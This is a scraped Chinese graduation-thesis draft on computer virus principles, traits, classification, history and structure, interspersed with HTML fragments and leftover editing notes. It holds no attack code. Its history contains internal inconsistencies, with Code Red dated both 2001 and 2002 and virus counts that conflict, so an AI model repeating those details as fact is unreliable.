病毒查殺畢業(yè)論文

1、<p>　　編號 </p><p><b>　　畢業(yè)論文</b></p><p><b>　　二〇一三年六月</b></p><p>　題 目計算機病毒的原理與防范查殺</p><p><b>　　摘 要</b></p><p

2、>　　隨著計算機技術(shù)的發(fā)展，計算機在每一個行業(yè)都得到了廣泛的應(yīng)用，各行各業(yè)對計算機系統(tǒng)的依賴越來越大，但是，隨著計算機網(wǎng)絡(luò)的發(fā)展，計算機病毒對信息安全的威脅日益嚴重，我們一方面要掌握對當前計算機病毒的防范措施，另一方面要加強對病毒未來發(fā)展趨勢的研究，真正做到防患于未然。現(xiàn)在計算機病毒是現(xiàn)代信息化社會的公害，是計算機犯罪的一種特殊形式。各種計算機病毒的產(chǎn)生和全球性的蔓延已經(jīng)給計算機系統(tǒng)的安全造成了巨大的危害和損害，其造成的計算機資源

3、的損失和破壞，不但會造成資源和財富的巨大浪費，而且有可能造成社會性的災(zāi)難。</p><p>　　加一點怎么查殺的內(nèi)容。</p><p>　　關(guān)鍵詞：計算機病毒 網(wǎng)絡(luò) 防范 </p><p><b>　　目 錄</b></p><p><b>　　摘 要I</b></p>

4、<p><b>　　目 錄II</b></p><p><b>　　第一章 緒論1</b></p><p><b>　　1.1 前言1</b></p><p>　　1.2 論文目標1</p><p>　　1.3 課題研究的意義2</p>

5、<p>　　第二章 計算機病毒概述3</p><p>　　2.1 計算機病毒定義3</p><p>　　2.2 宏和宏病毒的概念4</p><p>　　2.2 計算機病毒的基本特征5</p><p>　　2.2.1 感染性5</p><p>　　2.2.2 潛伏性（隱蔽性）5</p>

6、<p>　　2.2.3 可觸發(fā)性5</p><p>　　2.2.4 破壞性6</p><p>　　2.3 計算機病毒的分類6</p><p>　　2.3.1 傳統(tǒng)的計算機病毒6</p><p>　　2.3.2 計算機病毒的發(fā)展簡史7</p><p>　　第三章 計算機病毒的結(jié)構(gòu)和作用機制14&

7、lt;/p><p>　　3.1 計算機病毒的結(jié)構(gòu)組成14</p><p>　　3.2 病毒的引導(dǎo)部分15</p><p>　　3.2.1 病毒的引導(dǎo)模塊和引導(dǎo)機制15</p><p>　　3.3恢復(fù)系統(tǒng)功能16</p><p>　　3.3.1 病毒引導(dǎo)部分舉例16</p><p>　　3.

8、4 病毒的感染部分19</p><p>　　3.4.1 病毒的感染模塊及感染機制19</p><p>　　3.4.2 感染部分程序的舉例20</p><p>　　3.5 病毒的表現(xiàn)（破壞）部分24</p><p>　　3.5.1 病毒的表現(xiàn)（破壞）模塊及表現(xiàn)（破壞）機制24</p><p>　　3.5.2 表

9、現(xiàn)部分程序舉例25</p><p>　　3.6 宏病毒的運行機制30</p><p>　　第四章 檢測計算機病毒的基本方法34</p><p>　　4.1 外觀檢測法34</p><p>　　4.1.1 屏幕顯示異常34</p><p>　　4.1.2 聲音異常34</p><p>

10、　　4.1.3 系統(tǒng)工作異常35</p><p>　　4.1.4 文件異常35</p><p>　　4.2 計算機病毒檢測的綜合方法36</p><p>　　4.3 檢測宏病毒的基本方法41</p><p>　　第五章 清除計算機病毒的基本技術(shù)43</p><p>　　5.1 清除計算機病毒的一般性原則43

11、</p><p>　　5.2 清除宏病毒的基本方法45</p><p><b>　　第六章 總結(jié)46</b></p><p><b>　　致 謝47</b></p><p><b>　　參考文獻48</b></p><p><b>　

12、　緒論</b></p><p><b>　　1.1 前言</b></p><p>　　計算機技術(shù)的迅猛發(fā)展，給人們的工作和生活帶來了前所未有的便利和效率，隨著計算機走進社會的各個領(lǐng)域，走進千家萬戶，計算機系統(tǒng)已經(jīng)能實現(xiàn)生活、管理、辦公的自動化，成為人類社會不可或缺的一部分。與此同時，計算機安全的重要性也被越來越多的人認識到，商業(yè)界、金融銀行界要依靠計算機處

13、理事務(wù)，政府的行政管理要依靠計算機信息系統(tǒng)和數(shù)據(jù)庫，廠家和公司的全部生產(chǎn)取決于數(shù)據(jù)處理系統(tǒng)的能力，陸、海、空、宇航等指揮系統(tǒng)，醫(yī)療衛(wèi)生要依靠計算機技術(shù)，整個社會對計算機信息系統(tǒng)的依賴越來越大，甚至離不開它。然而，計算機系統(tǒng)并不安全，其不安全因素有計算機信息系統(tǒng)自身的、自然的，也有人為的。計算機系統(tǒng)就是最不安全的因素之一。隨著信息化社會的發(fā)展，計算機病毒的威脅日益嚴重，迄今為止，已發(fā)現(xiàn)的病毒種類很多，而且還以相當驚人的速度遞增，令人們談病

14、毒而色變。人們將計算機病毒稱之為“21世紀最大的隱患”、“不流血的致命武器”，它的出現(xiàn)完全有可能改變?nèi)祟惖奈磥?，因此反病毒的任?wù)變得更加艱巨了。</p><p><b>　　1.2 論文目標</b></p><p>　　為了培養(yǎng)學(xué)生嚴肅認真的科學(xué)態(tài)度和實事求是的工作作風，形成正確的世界觀和價值觀，掌握科學(xué)的方法論。</p><p>　　為了培養(yǎng)

15、學(xué)生綜合應(yīng)用所學(xué)基礎(chǔ)理論、專門知識、基本技能的發(fā)現(xiàn)。分析、解決與電腦中了病毒的實際問題的能力，以及從事其他科學(xué)研究工作或負擔專門技術(shù)工作的基本能力。</p><p>　　為了能讓稍微了解電腦的人們在自己電腦中了病毒時能夠自己動手解決不已。</p><p>　　1.3 課題研究的意義</p><p>　　當今社會是一個信息化的社會，隨著internet的出現(xiàn)使得信息出

16、現(xiàn)了爆炸性的增長。從而使得信息泛濫成災(zāi)，嚴重的影響了重要信息和知識的傳播。隨著internet的普及，互聯(lián)網(wǎng)以一股巨大變革力量的面貌出現(xiàn)在商務(wù)關(guān)系領(lǐng)域。它的強大功能被人們深刻的記著，并且已經(jīng)在各個領(lǐng)域發(fā)揮著越來越重要的作用。</p><p>　　但是，計算機病毒的出現(xiàn)將成為計算機使用者的噩夢，它的功能就是破壞，破壞計算機里的一切信息，甚至會破壞計算機本身的硬件，使得計算機使用者無法使用，不僅僅是對計算機使用者而言

17、，對使用計算機的公司也會造成巨大的損失。如果能夠?qū)τ嬎銠C病毒有足夠的了解，就會對計算機病毒進行防范，即使中了病毒也能去解決，從而不會造成很大的損失。</p><p><b>　　計算機病毒概述</b></p><p>　　2.1 計算機病毒定義</p><p>　　計算機病毒是一個程序, 一段可執(zhí)行碼。像生物病毒一樣, 計算機病毒有其獨特的復(fù)制

18、能力, 可以很快地蔓延, 又常常難以根除, 它們能把自身附著在各種類型的文件上, 當文件被復(fù)制或從一個用戶傳送到另一個用戶時, 它們就隨同文件一起蔓延開來?，F(xiàn)在, 隨著計算機網(wǎng)絡(luò)的發(fā)展, 計算機病毒和計算機網(wǎng)絡(luò)技術(shù)相結(jié)合, 蔓延的速度更加迅速。在生物學(xué)中, 病毒是指侵入動植物體等有機生命體中的具有感染性、潛伏性、破壞性的微生物, 而且不同的病毒具有不同的誘發(fā)因素?！坝嬎銠C病毒”一詞是人們聯(lián)系到破壞計算機系統(tǒng)的“病原體”具有與生物病毒相似

19、的特征, 借用生物學(xué)病毒而使用的計算機術(shù)語?！坝嬎銠C病毒”一詞最早出現(xiàn)在美國作家Thomas J . Ryan 于1977 年出版的科幻小說《The Adolescence of P-1》中。</p><p>　　1983 年, 美國計算機安全專家Frederick Cohen 博士首次提出計算機病毒的存在, 他認為： 計算機病毒是一個能感染其他程序的程序, 它靠修改其他程序, 并把自身的拷貝嵌入其他程序而實現(xiàn)病

20、毒的感染。1989 年, 他進一步將計算機病毒定義為：“病毒程序通過修改其他程序的方法將自己的精確拷貝或可能演化的形式放入其他程序中, 從而感染它們”。所謂感染, 是指病毒將自身嵌入到指令序列中, 致使執(zhí)行合法程序的操作招致病毒程序的共同執(zhí)行( 或是以病毒程序的執(zhí)行取而代之) 。</p><p>　　1994 年《中華人們共和國計算機安全保護條例》定義：“計算機病毒是指編制或者在計算機程序中插入的, 破壞計算機功

21、能或數(shù)據(jù)、影響計算機使用, 并能自我復(fù)制的一組計算機指令或者程序代碼”。當然, 還有其他人的不完全相同的定義, 但都大同小異。</p><p>　　2.2 宏和宏病毒的概念</p><p>　　宏病毒與傳統(tǒng)的計算機病毒有很大的不同，它不感染. EXE、. COM 等可執(zhí)行文件, 而是將病毒代碼以宏( Macro) 的形式潛伏在Microsoft Office 文件中, 當采用Office

22、軟件打開這些染毒文件時, 這些代碼就會被執(zhí)行并產(chǎn)生破壞作用。由于宏是使用Visual Basic For Application 這樣的高級語言編寫的, 因此其編寫過程相對比較簡單, 而功能又十分強大。隨著Microsoft Office 軟件在全世界范圍內(nèi)的不斷普及, 宏病毒已成為傳播最廣、危害最大的一類病毒。</p><p>　　由于在目前發(fā)現(xiàn)的宏病毒當中, 感染W(wǎng)ord 的病毒占絕大多數(shù), 所以人們談?wù)摰暮?/p>

23、病毒一般是指Word 宏病毒, 而了解Word 宏病毒之后, 也就不難理解其他的宏病毒了。在Windows 環(huán)境下數(shù)據(jù)文件是由Word 等文字處理軟件建立的, 被稱為文檔文件或文檔。Word 文檔中包含兩種信息： 一是文本信息或稱文本, 是由中英文文字組成的段落篇章; 二是格式信息, 包括表格、字體、字號等信息。</p><p>　　在Microsoft Word 中對宏的定義為“宏就是能夠組織在一起的, 可以作

24、為一個獨立命令來執(zhí)行的一系列Word 命令, 它能使日常工作變得容易”。簡單地講, 宏就是一組批處理命令, 是用高級語言( VB) 編寫的一段程序。Word 文檔中的格式信息就包含了很多這樣的宏。Word 的宏語言有十分強大的功能, 它具備訪問系統(tǒng)的能力, 可以直接運行DOS 系統(tǒng)命令, 調(diào)用Windows API 、DLL 等。這些操作都可能對系統(tǒng)的安全直接構(gòu)成威脅。</p><p>　　如果一個宏中包含了上述

25、形式的有破壞能力的命令, 并且還有自我復(fù)制功能, 這個宏就成了宏病毒。概括起來講, 宏病毒就是使用宏語言編寫的有一定破壞能力的程序, 可以在一些數(shù)據(jù)處理系統(tǒng)中運行( 主要是微軟的辦公軟件系統(tǒng), 字處理、電子數(shù)據(jù)表和其他Office 程序中) , 存在于字處理文檔、數(shù)據(jù)表格、數(shù)據(jù)庫、演示文檔等數(shù)據(jù)文件中, 利用宏語言的功能將自己復(fù)制到其他數(shù)據(jù)文檔中。</p><p>　　除了Word 宏病毒外, 常見的還有Exce

26、l 宏病毒、PowerPoint 宏病毒等, 主要是針對Microsoft Office 軟件的。</p><p>　　2.2 計算機病毒的基本特征</p><p><b>　　2.2.1 感染性</b></p><p>　　計算機病毒的感染性是指計算機病毒具有把自身復(fù)制到其他程序中的特性。感染性是計算機病毒的根本屬性，它是判斷一個程序是否為病

27、毒程序的主要依據(jù)。病毒它可以感染文件、硬盤、個人計算機、局部網(wǎng)絡(luò)和互聯(lián)網(wǎng)。計算機病毒的感染是指從一個網(wǎng)絡(luò)侵入另一個網(wǎng)絡(luò)，由一個系統(tǒng)擴散到另一個系統(tǒng)，由一個磁盤進入到另一個磁盤，或者由一個文件傳播到另一個文件的過程。</p><p>　　2.2.2 潛伏性（隱蔽性）</p><p>　　計算機病毒的潛伏性是指其具有依附于其他媒體而寄生的能力，即通過修改其他程序而自身的復(fù)制品嵌入到其他程序或磁

28、盤的引導(dǎo)區(qū)( 包括硬盤的主引導(dǎo)區(qū)中) 寄生。這種能力是隱蔽的，大多數(shù)計算機病毒的感染速度極快。而且大多數(shù)計算機病毒都采用特殊的隱藏技術(shù)，例如有些計算機病毒感染正常程序時將程序文件壓縮，留出空間嵌入計算機病毒程序，這樣使被計算機病毒感染的程序文件的長度變化很小，很難被發(fā)現(xiàn)；有些計算機病毒修改文件的屬性等；還有些計算機病毒可以加密、變型( 多態(tài)病毒) 或防止反匯編、防跟蹤等等都是為了不讓被感染的計算機用戶發(fā)現(xiàn)。當計算機病毒侵入系統(tǒng)后，一般并

29、不立即發(fā)作，而是具有一定的潛伏期。在潛伏期，只要條件許可，病毒就會不斷地進行感染。</p><p>　　2.2.3 可觸發(fā)性</p><p>　　計算機病毒一般都有一個觸發(fā)條件：或者觸發(fā)其感染,，即在一定的條件下激活一個計算機病毒的感染機制使之進行感染；或者觸發(fā)其發(fā)作，即在一定條件下激活計算機病毒的表現(xiàn)( 破壞) 部分。條件判斷是計算機病毒自身特有的功能， 一種計算機病毒一般設(shè)置一定的觸發(fā)

30、條件。病毒程序在運行時，每次都要檢測控制條件，一旦條件成熟，病毒就開始感染或發(fā)作。觸發(fā)條件可能是指定的某個時間或日期、特定的用戶識別符的出現(xiàn)、特定文件的出現(xiàn)或使用次數(shù)、用戶的安全保密等級、某些特定的數(shù)據(jù)等等。</p><p><b>　　2.2.4 破壞性</b></p><p>　　計算機病毒的破壞性是病毒的重要特征，如果一個計算機病毒對計算機沒有任何破壞的壞，那么

31、這個病毒還有什么用呢？當然，計算機病毒的破壞性取決于設(shè)計者的目的水平，如果病毒設(shè)計者的目的在于破壞系統(tǒng)的正常運行，則可以毀掉或修改系統(tǒng)內(nèi)的部分或全部數(shù)據(jù)或文件，例如改寫文件、刪除文件、格式化磁盤等等；可以干擾或迷惑用戶的操作，例如鎖死鍵盤或修改鍵盤的功能等等；可以干擾系統(tǒng)的運行，如干擾屏幕顯示、降低機器的運行速度等等；也可以損壞硬件( 主板, 磁盤等) 。</p><p>　　歸納起來，計算機病毒的危害大致有以下

32、幾個方面：</p><p>　　1、對計算機數(shù)據(jù)信息進行直接的破壞</p><p><b>　　2、搶占系統(tǒng)資源</b></p><p>　　3、影響計算機運行速度</p><p>　　4、病毒對計算機硬件的破壞</p><p>　　2.3 計算機病毒的分類</p><p>

33、;　　2.3.1 傳統(tǒng)的計算機病毒</p><p>　　按計算機病毒攻擊的機型分類：有攻擊微型機的病毒、攻擊小型機的病毒和攻擊工作站的病毒。</p><p>　　按計算機病毒攻擊的操作系統(tǒng)分類：有攻擊DOS的病毒、攻擊Windows系統(tǒng)的病毒、攻擊Unix或OS/2系統(tǒng)的病毒。</p><p>　　按傳播媒介分類：有單機病毒、網(wǎng)絡(luò)病毒。</p><

34、;p>　　按計算機病毒的寄生方式分類：有源碼型病毒、入侵型病毒、外殼型病毒、操作系統(tǒng)型病毒。</p><p>　　按病毒的表現(xiàn)（破壞）分類：有良性病毒、惡性病毒。</p><p>　　按計算機病毒寄生方式和感染途徑分類：有引導(dǎo)型病毒、文件型病毒、混合型病毒。</p><p>　　2.3.2 計算機病毒的發(fā)展簡史 寫得太多 簡單一點</p><

35、;p>　　計算機剛剛誕生, 就有了計算機病毒的概念。1949 年, 計算機之父馮·諾依曼在《復(fù)雜自動機組織論》中便定義了病毒的基本概念。他提出“一部事實上足夠復(fù)雜的機器能夠復(fù)制自身”, 但當時的人們還不能理解能夠復(fù)制自身的概念( 而能夠復(fù)制自身正是計算機病毒的本質(zhì)特征之一) , 所以并沒有多少人認真對待計算機病毒這種事情。</p><p>　　20 世紀60 年代初, 美國貝爾實驗室里,3 個年輕

36、的程序員編寫了一個名為“磁芯大戰(zhàn)”的游戲, 游戲中通過復(fù)制自身來擺脫對方的控制, 這就是所謂“計算機病毒”的第一個雛形。而“計算機病毒”作為一個名詞, 最早出現(xiàn)在科幻小說之中。1975 年, 美國科普作家John Bruner( 約翰·布魯勒爾) 在他的名為《Shock Wave Rider》( 《震蕩波騎士》) 的書中,出現(xiàn)了以“Virus”用電腦作為邪惡代表的工具的故事。1977 年, 美國的Thomas J . Ryan

37、( 托馬斯·簡·瑞恩) 在其名為《The Adolescence of P-1》( 《P-1 的青春》) 的科幻小說中, 幻想</p><p>　　出世界上第一個計算機病毒, 它可以從一臺計算機感染到另一臺計算機, 最終控制了7000 臺計算機的操作系統(tǒng), 造成了一場大災(zāi)難。</p><p>　　1981 年, 世界上誕生了真正意義上的計算機病毒———Elk Clone

38、r , 這個病毒將自己附著在磁盤的引導(dǎo)扇區(qū)上, 通過磁盤進行感染。由于它沒有造成多大的破壞, 只是關(guān)掉顯示器, 讓顯示的文本閃爍或顯示一大堆亂七八糟的信息, 所以, 它沒有引起大家的關(guān)注。</p><p>　　1983 年, 計算機病毒首次在計算機界被確認存在。1983 年11 月3 日, 美國計算機安全學(xué)術(shù)討論會上, 美國計算機安全專家Frederick Cohen 博士首次提出計算機病毒的概念。同一天, 專家

39、們在運行Unix 操作系統(tǒng)的VAX11/ 750 計算機系統(tǒng)上驗證了計算機病毒的存在。在其后的一周內(nèi), 在5 次病毒試驗中, 平均30 分鐘病毒就可使計算機系統(tǒng)癱瘓, 由此不僅確認了計算機病毒的存在, 而且認識到計算機病毒對計算機系統(tǒng)的破壞作用。</p><p>　　1986 年底, 病毒Brain 開始流行, 這是由巴基斯坦兩兄弟Basit 和Amjad Farooq Alvi制造的, 據(jù)他們說, 制作這個病毒

40、的目的是檢驗一下盜版問題在巴基斯坦的嚴重程度( 事實上, 病毒的蔓延遠遠超出了他們的估計) 。Brain 病毒首次使用了偽裝的手段來迷惑計算機用戶。1987 年10 月, 美國新聞機構(gòu)報道了這一例計算機遭病毒入侵及引起破壞的事件, 從此計算機病毒開始受到廣大民眾的關(guān)注。</p><p>　　在這一年, 中國的公安部成立了計算機病毒研究小組, 并派出專業(yè)技術(shù)人員到中科院計算所和美國、歐洲進修, 學(xué)習計算機安全技術(shù),

41、 標志著計算機病毒引起了中國政府的警惕。</p><p>　　1987 年, 病毒現(xiàn)象逐步升溫, 這一年,DOS 環(huán)境下的文件型病毒得到了很大的發(fā)展,同時出現(xiàn)了很多的IBM PC 兼容機上的病毒。這一年, 首次出現(xiàn)了能自我加解密的Cascade 病毒, 標志著計算機病毒制造技術(shù)的進一步提高, 這也說明了病毒與反病毒技術(shù)的互相對抗、克制, 能自我加解密的病毒還有著名的新西蘭的Stoned 病毒和意大利的PingPo

42、ng 病毒等等。同年12 月份, 第一個網(wǎng)絡(luò)病毒———Christmas Tree 病毒———開始流行, 這種病毒在VM/ CMS 操作系統(tǒng)下傳播, 造成了IBM 公司內(nèi)部網(wǎng)絡(luò)的系統(tǒng)癱瘓。1988 年6 月13 號, 這天正好是星期五, 一些國家的公司和大學(xué)遭到了“耶路撒冷”( Jerusalem) 病毒的攻擊。該病毒因攻擊了耶路撒冷大學(xué)而得名, 又因為它是在非1987 年的既是13 號又是星期五的這天爆發(fā), 所以又被稱為“黑色星期五”

43、。</p><p>　　1988 年, 各種計算機病毒相繼出現(xiàn)并廣泛傳播。11 月2 日, 美國康奈爾大學(xué)的學(xué)生,23 歲的Morris 將自己編制的蠕蟲程序輸入到計算機網(wǎng)絡(luò)中, 在幾小時內(nèi)造成Internet 的堵塞,6 000 多臺計算機被感染, 造成巨大的損失。從此在國際計算機領(lǐng)域掀起了一個談?wù)摬《镜母叱? 一時成為計算機界的熱點。在美國, 僅1988 年中, 就約有9 萬臺計算機遭計算機病毒入侵, 大家公

44、認1988 年為世界計算機病毒年。</p><p>　　1988 年11 月,《人民日報》就Morris 事件報道了關(guān)于病毒的事件, 這是國內(nèi)媒體首次關(guān)注計算機病毒。</p><p>　　同時, 反病毒技術(shù)也已經(jīng)開始成熟了, 所羅門公司的反病毒工具———Doctors Solomon’sAnti- Virus Toolkit ———成為當時最強大的反病毒軟件。</p><

45、;p>　　1989 年, 病毒家族開始出現(xiàn)了, 比如Yankee 病毒( 這是一個惡性病毒, 會格式化硬盤) 。同年出現(xiàn)的Eddie 病毒則可以駐留內(nèi)存, 不僅感染被調(diào)用的文件, 還感染被打開或被拷貝的文件。Frodo 病毒是第一個全秘密寄生的文件病毒, 它不改變被感染文件的長度。同年出現(xiàn)了名為AIDS 的特洛伊木馬型病毒, 作者Popp 博士因靠此病毒為受害者恢復(fù)數(shù)據(jù)勒索錢財而被捕入獄。</p><p>

46、　　1989 年4 月西南鋁廠首先報告在其計算機中發(fā)現(xiàn)“小球”病毒。同年, 又有一些單位的計算機也發(fā)現(xiàn)“小球”病毒及其變種或其他病毒, 自此, 計算機病毒開始侵入我國( 沒有記錄的病毒侵入肯定更早) 。</p><p>　　1989 年7 月, 中國公安部推出了中國最早的殺毒軟件Kill 6 .0 , Kill 軟件在隨后很長的一段時間內(nèi)都是由公安部免費向國內(nèi)部分用戶發(fā)放。</p><p>

47、;　　1990 年, 出現(xiàn)了第一個多態(tài)病毒Chameleon 、使用多級加密解密和反跟蹤技術(shù)的病毒W(wǎng)hale 等具有更好隱藏技術(shù)的病毒, 標志著病毒制造技術(shù)的又一次提高。同年, 保加利亞的程序員開發(fā)出了可以用于開發(fā)病毒的工具軟件———Virus Production Factory ; 同樣在保加利亞, 同年出現(xiàn)了專門為病毒制造者開設(shè)的進行病毒信息交流和病毒交換的BBS。</p><p>　　1990 年, 中國

48、出現(xiàn)了基于硬件的反病毒系統(tǒng)———華星防病毒卡, 取得不錯的銷售業(yè)績。</p><p>　　1991 年, 計算機病毒的數(shù)量持續(xù)上升, 世界上已知病毒的總數(shù)已向1000 攀升。這一年發(fā)現(xiàn)的比較有名的病毒有能夠同時感染文件和引導(dǎo)區(qū)的復(fù)合多態(tài)病毒Tequila ; 不存在于某個文件或引導(dǎo)扇區(qū)中的DIR II 病毒, 它將自己分成小塊, 然后放在磁盤上的多個扇區(qū)中, 運行的時候再進行組裝和執(zhí)行; 攻擊網(wǎng)絡(luò)的GPI 病毒等

49、。</p><p>　　這一年, 反病毒公司也得到了發(fā)展壯大,Symantec( 著名的反病毒工具軟件Norton 就是它的產(chǎn)品) 和Central Point( 以軟件PCTOOLS 著名) 兩個重要的工具軟件開發(fā)商開始介入殺毒市場。中國的瑞星公司成立, 推出了瑞星防病毒卡。</p><p>　　1992 年, 多態(tài)病毒生成器“MtE”開發(fā)出來, 同年, 一個病毒構(gòu)造工具集———Viru

50、s CreateLibrary ———開發(fā)成功。這些病毒開發(fā)工具或一些BBS 的出現(xiàn)又刺激了新的、更加強大和完善的病毒制造工具被不斷開發(fā)出來, 所有這些病毒制造工具或BBS 上的信息交流促使了更多的病毒被源源不斷地制造出來。這一年, 在芬蘭發(fā)現(xiàn)了首例Windows 病毒。</p><p>　　1993 年、1994 年, 采用密碼技術(shù)、編寫技巧高超的隱蔽型病毒和多態(tài)性病毒相繼出現(xiàn), 而且社會上出現(xiàn)了計算機病毒的恐

51、慌和騙局, 也出現(xiàn)了感染源代碼文件( 主要是C 語言和Pascal 語言) 的Src Vir 病毒和感染OBJ 文件的Shifter 病毒。在這兩年中, 中國的殺毒軟件KILL( V68) 和KV100 開始銷售1995 年8 月9 日, 在美國首次發(fā)現(xiàn)專門攻擊Word 文件的新病毒———宏病毒Concept 。以前的病毒都是在DOS 或Unix 操作系統(tǒng)下感染和破壞的,Concept 病毒的出現(xiàn), 宣告了攻擊Windows 操作系統(tǒng)的

52、病毒的大規(guī)模出現(xiàn)。</p><p>　　1996 年和1997 年開始了新一輪的計算機病毒的進化, 隨著微軟新的操作系統(tǒng)Windows 95 、Windows NT 和微軟辦公軟件Office 的流行, 病毒制造者開始面對新的環(huán)境, 制造出了許多新的病毒。1997 年2 月, 第一個Linux 環(huán)境下的病毒Bliss 出現(xiàn), 結(jié)束了Linux 系統(tǒng)從未被病毒感染的歷史。1997 年4 月, 第一個使用文件傳輸協(xié)議

53、( FTP ：FileTransport Protocol) 進行傳播的Homer 病毒出現(xiàn)。</p><p>　　1998 年6 月, 被稱作有史以來影響最大的病毒———CIH 病毒———被發(fā)現(xiàn), 這是世界上首例能夠破壞硬件的病毒, 它既攻擊硬盤中的文件系統(tǒng), 又攻擊計算機硬件( 主板) , 并使其損壞。它的破壞性使其聞名世界。這一年也出現(xiàn)了許多新型病毒, 如遠程控制工具“Back Orifice”、“Netb

54、us”等, 第一個感染Java 可執(zhí)行文件的Strange Brew 病毒, 一種新的用實用VB 腳本語言編寫的Robbit 病毒。后3 種類型的病毒以及這3 種技術(shù)結(jié)合產(chǎn)生的病毒( 還有以后一些新的技術(shù)) 都是之后直到現(xiàn)在最流行的病毒。</p><p>　　1999 年, 通過郵件進行病毒傳播開始成為病毒傳播的主要途徑, 而宏病毒仍然是最流行的病毒。這一年, 比較有名的病毒有：Melissa , 一種宏病毒和蠕

55、蟲的混合物, 通過電子郵件系統(tǒng)大量傳播, 造成網(wǎng)絡(luò)的阻塞、癱瘓;Happy99 ;FunLove 等等。</p><p>　　2000 年被稱作VBScript 病毒/ 蠕蟲之年。大量使用腳本技術(shù)的病毒出現(xiàn), 腳本病毒和蠕蟲、傳統(tǒng)的病毒、木馬程序以及操作系統(tǒng)的安全漏洞相結(jié)合, 給病毒技術(shù)帶來了一個新的發(fā)展高峰。VBS/ KAK 蠕蟲利用因特網(wǎng)瀏覽器和Outlook 中的漏洞( Scirptlet .Typelib

56、 和Eyedog) , 靠用戶用Outlook 打開或預(yù)覽一個含有病毒性VBScript 的HTML 文件而使用戶的機器感染;Loveletter 病毒則是以給電子郵件的附件兩個擴展名的詭計( Love- Letter-for you .txt .vbs) 來得到比Melissa 病毒更快更遠的傳播。</p><p>　　2000 年, 中國的金山公司發(fā)布金山毒霸, 金山公司開始進入殺毒軟件市場。</p&g

57、t;<p>　　2001 年可謂是計算機安全領(lǐng)域的多事之秋。7 月出現(xiàn)的Code Red 和Code Red II ,特別是9 月出現(xiàn)的Ni mda 病毒( 以36 .07 % 高居本年度病毒感染率第一) , 更是突破了以往病毒的各種傳播途徑, 它們會利用微軟服務(wù)器漏洞植入后門程序的特洛伊木馬, 或是通E- mail 大肆傳播、衍生無數(shù)變種的計算機蠕蟲, 也有可能是通過瀏覽網(wǎng)頁下載病毒, 甚至三者兼具, 造成了大范圍的因特

58、網(wǎng)上的服務(wù)器被阻斷或訪問速度下降, 在世界范圍內(nèi)造成了巨大的損失。僅Code Red 病毒所造成的經(jīng)濟損失, 就遠遠超過過去6 年來任何一年的年度損失。根據(jù)趨勢科技TrendLabs 全球防病毒研發(fā)暨技術(shù)支持中心所做的2001 年十大病毒統(tǒng)計, 蠕蟲、特洛依木馬型病毒占絕大部分, 自1995 年起持續(xù)6 年為病毒主要形態(tài)的宏病毒已退居十大病毒之外, 而E- mail 仍為傳播病毒的熱門渠道。</p><p>　　

59、2001 年前病毒的形態(tài)非常單純, 依其感染的方式, 可分為感染開機區(qū)的開機型、感染執(zhí)行文件的文件型、感染W(wǎng)ord 文件的文件宏病毒型等等。而自從2002 年7 月,Code Red利用IIS 漏洞揭開了黑客與病毒并肩作戰(zhàn)的反傳統(tǒng)的攻擊模式,Code Red 在病毒史上的地位, 就如同第一個病毒Brain 一樣, 具有難以抹滅的歷史意義。同時這種反傳統(tǒng)的攻擊模式, 使得傳統(tǒng)的防毒軟件面臨更高的挑戰(zhàn)。從首例計算機病毒被發(fā)現(xiàn)起, 病毒的發(fā)展

60、速度十分驚人( 雖然各種說法不盡相同) 。按照較多的一種說法,1988 年底, 病毒不足100 種;1987 年到1989 年間發(fā)現(xiàn)的計算機病毒有80 多種;1991 年, 全球病毒數(shù)量不到500 種;1994 年夏, 病毒的數(shù)量已近5000 種; 到1998 年夏, 全世界已發(fā)現(xiàn)的病毒超過15 000 種; 到2000 年底, 病毒的數(shù)量已超過55 000種; 到了2002 年, 病毒數(shù)量已增至60000 種。2000 年12 月在日

61、本東京舉行的“亞洲計算機反病毒大會”對2000 年11 月以前的病毒種類和數(shù)量作出了初步的報告：</p><p>　　DOS 病毒： 40 000 種</p><p>　　Windows 32 病毒： 15 種</p><p>　　Windows 9x 病毒： 600 種</p><p>　　Windows NT/ Windows 2000

62、病毒： 200 種</p><p>　　Word 宏病毒： 7500 種</p><p>　　Excel 宏病毒： 1500 種</p><p>　　PowerPoint 病毒： 100 種</p><p>　　Script 腳本病毒： 500 種</p><p>　　Macintos 蘋果機病毒： 50 種</

63、p><p>　　Linux 病毒： 5 種</p><p><b>　　手機病毒： 2 種</b></p><p>　　合計： 55000 種</p><p>　　在病毒的發(fā)展史上, 病毒的出現(xiàn)是有規(guī)律的。一般情況下, 一種新的病毒技術(shù)出現(xiàn)后, 病毒迅速發(fā)展, 接著反病毒技術(shù)的發(fā)展會抑制其流傳; 操作系統(tǒng)進行升級時, 病毒也

64、會調(diào)整為新的方式, 產(chǎn)生新的病毒技術(shù)。</p><p>　　計算機病毒的結(jié)構(gòu)和作用機制</p><p>　　3.1 計算機病毒的結(jié)構(gòu)組成</p><p>　　計算機病毒是一段特殊程序，它的其最大特點是具有感染能力和表現(xiàn)( 破壞) 能力。計算機病毒在程序結(jié)構(gòu)、磁盤上的存儲方式、感染目標的方式以及控制系統(tǒng)的方式上既具有許多共同的特點，同時又有許多特殊的技巧和方法，了解病

65、毒程序的這些結(jié)構(gòu)和特征對于有效地預(yù)防、檢測和清除病毒是非常有必要的。</p><p>　　計算機病毒與生物病毒一樣，有其自身的病毒體( 病毒程序) 和寄生體。寄生體為病毒提供一種生存環(huán)境，當病毒程序寄生于合法程序的時候，病毒就成為了程序的一部分，并在程序中占有合法的地位，這樣合法程序就成了病毒程序的寄生體，或稱病毒程序的載體。病毒可寄生于合法程序的任何位置。</p><p>　　計算機病毒

66、之所以具有寄生能力和破壞能力，和病毒程序的結(jié)構(gòu)有關(guān)。從目前已出現(xiàn)的病毒來看，病毒都具有相同的邏輯程序結(jié)構(gòu)如圖3 .1 所示，一</p><p>　　般包含3 大模塊即：引導(dǎo)模塊、感染模塊和表現(xiàn)( 破壞) 模塊。其中后兩個模塊都包括一段觸發(fā)條件檢查程序段，它們分別檢查是否滿足觸發(fā)條件和是否滿足表現(xiàn)( 破壞) 的條件，一旦相應(yīng)的條件得到滿足，病毒就會進行感染和表現(xiàn)( 破壞) 。</p><p>

